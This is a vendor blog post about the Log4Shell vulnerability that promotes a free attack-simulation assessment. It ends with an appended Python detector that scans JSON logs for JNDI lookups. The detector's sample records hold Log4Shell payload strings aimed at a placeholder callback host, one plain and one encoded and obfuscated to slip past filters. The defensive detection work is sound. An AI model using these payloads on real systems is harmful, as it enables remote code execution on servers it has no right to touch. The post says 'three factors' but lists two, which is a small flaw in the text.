Log4J / Log4Shell: Is Your Network Safe? Find Out for Free with Keysight

If you are looking for information about Log4J impact on Keysight products, please visit our Product and Solution Cyber Security page. If you are interested in how Keysight can validate your perimeter security protection from Log4J, read on.

Over the last 72 hours or so, most of the cybersecurity world has become aware of the Log4j / Log4Shell zero-day vulnerability and its widespread impact on most web servers, cloud applications, internet appliances, and embedded devices. You can read all the gory details documented in CVE-2021-44228, but here’s the bottom line: this has the potential to be really, really bad.

So, why is everyone so worried about Log4j? In short, there are three factors combining to make this a “perfect storm” of a vulnerability:

- It affects the JNDI library, which is incredibly widespread.
- It enables arbitrary code execution on a target’s system.

We’re not trying to fully document the technical aspects of the attack here. There are plenty of sources for that online.

At this moment, network and security teams are racing to mitigate the threats to their systems via a combination of updating to Log4j 2.15, the latest version of the software, and enabling screening protection on perimeter devices. Given the severity, 10 out of 10, of the vulnerability and the widespread exploitation attempts we are seeing in the wild, it’s extremely important to mitigate the threat as quickly as possible. But given the realities of holiday staffing and system uptime demands, patching may be difficult to expedite - so WAFs and Next-Gen Firewalls will be called into service as front-line protection until system vulnerabilities are directly addressed.

However, screening for Log4j attacks is decidedly nontrivial. That’s why it’s a good idea to test your protection to validate it’s working as expected while you work on system patching. We can help with that - and it won’t cost you a dime.

Let’s take a look at what we’ve observed of the attack directly. Keysight operates a global honeypot network, which we use to track the various malware and other attacks hackers are employing each and every day. CVE-2021-44228 was just released Friday afternoon. As you can see from the graph below, Log4j exploitation attempts against our honeypots were exploding by late Saturday.

What do these attacks look like in real life? Here’s a look at some JSON logs pulled from one of our honeypots. We’ve changed the IP addresses to obscure both our IP addresses and those of the attacker, but make no mistake: this is a real attack attempt. As you can see, the attacker is trying to trick our system (not vulnerable) into fetching code from the \securityscan, which would then be executed locally. We’ve seen this attempt executed over LDAP and DNS, but other mechanisms are possible.

[Figure: Live Log4j exploit JSON from honeypot]

HOW CAN YOU PROTECT YOURSELF FROM LOG4J?

Of course, we recommend that you update your vulnerable systems as quickly as possible. However, as an immediate safeguard, it’s also quick and prudent to implement perimeter screening on your WAF, IDS/IPS, or NGFW in parallel. Due to the urgency and severity of the issue, and the exposure level so many will have, it’s also a very good idea to test your protection. That’s why we’re offering a free Log4j vulnerability assessment via Keysight Threat Simulator. An element of Keysight’s Security Operations Suite, Threat Simulator is a breach and attack simulation tool that safely simulates attacks against your network, endpoints, email, and perimeter defense systems to highlight any areas where your protection falls short.
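As an added example (not Keysight's code and not its honeypot data), here is one way to screen JSON log records like the honeypot logs described above for JNDI lookup strings. It percent-decodes each field and collapses nested lookups before matching, which is part of why simple signature screening is nontrivial. The record layout, field names, IP addresses and host name are constructed assumptions.

```python
import json
import re
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^${}]*)\}")   # innermost ${...}: nothing nested inside
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

def _substitute(match):
    """Approximate the text Log4j would put in place of one inner lookup."""
    expr = match.group(1).strip()
    if expr.lower().startswith("jndi:"):
        return match.group(0)             # keep it: this is what gets reported
    if expr.lower().startswith(("lower:", "upper:")):
        return expr.split(":", 1)[1]      # ${lower:J} -> J
    if ":-" in expr:
        return expr.partition(":-")[2]    # default value of an unresolved lookup
    return ""                             # any other lookup: assume it resolves empty

def normalise(value):
    """Percent-decode, then collapse nested lookups until nothing changes."""
    text, previous = unquote(value), None
    for _ in range(10):                   # bounded, since the input is hostile
        if text == previous:
            break
        previous, text = text, INNER.sub(_substitute, text)
    return text

def strings(node, path=""):
    """Yield (dotted_path, string) for every string value in parsed JSON."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, (dict, list)):
        items = node.items() if isinstance(node, dict) else enumerate(node)
        for key, child in items:
            yield from strings(child, f"{path}.{key}" if path else str(key))

def scan(line):
    """Return [(field, jndi_protocol), ...] for one JSON log line."""
    return [(path, m.group(1).lower())
            for path, value in strings(json.loads(line))
            for m in JNDI.finditer(normalise(value))]

# Constructed records (documentation IPs, placeholder host), not real honeypot data.
SAMPLE = [
    '{"src_ip": "203.0.113.7", "uri": "/", "headers": {"User-Agent": "${jndi:ldap://callback.example/a}"}}',
    '{"src_ip": "198.51.100.9", "uri": "/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Adns%3A%2F%2Fcallback.example%7D", "headers": {"User-Agent": "curl/7.79"}}',
    '{"src_ip": "192.0.2.44", "uri": "/index.html", "headers": {"User-Agent": "Mozilla/5.0"}}',
]
print([scan(record) for record in SAMPLE])
```

A hit here only means a lookup string was logged; whether the target was vulnerable has to be established separately, for example from outbound LDAP or DNS traffic originating from that host.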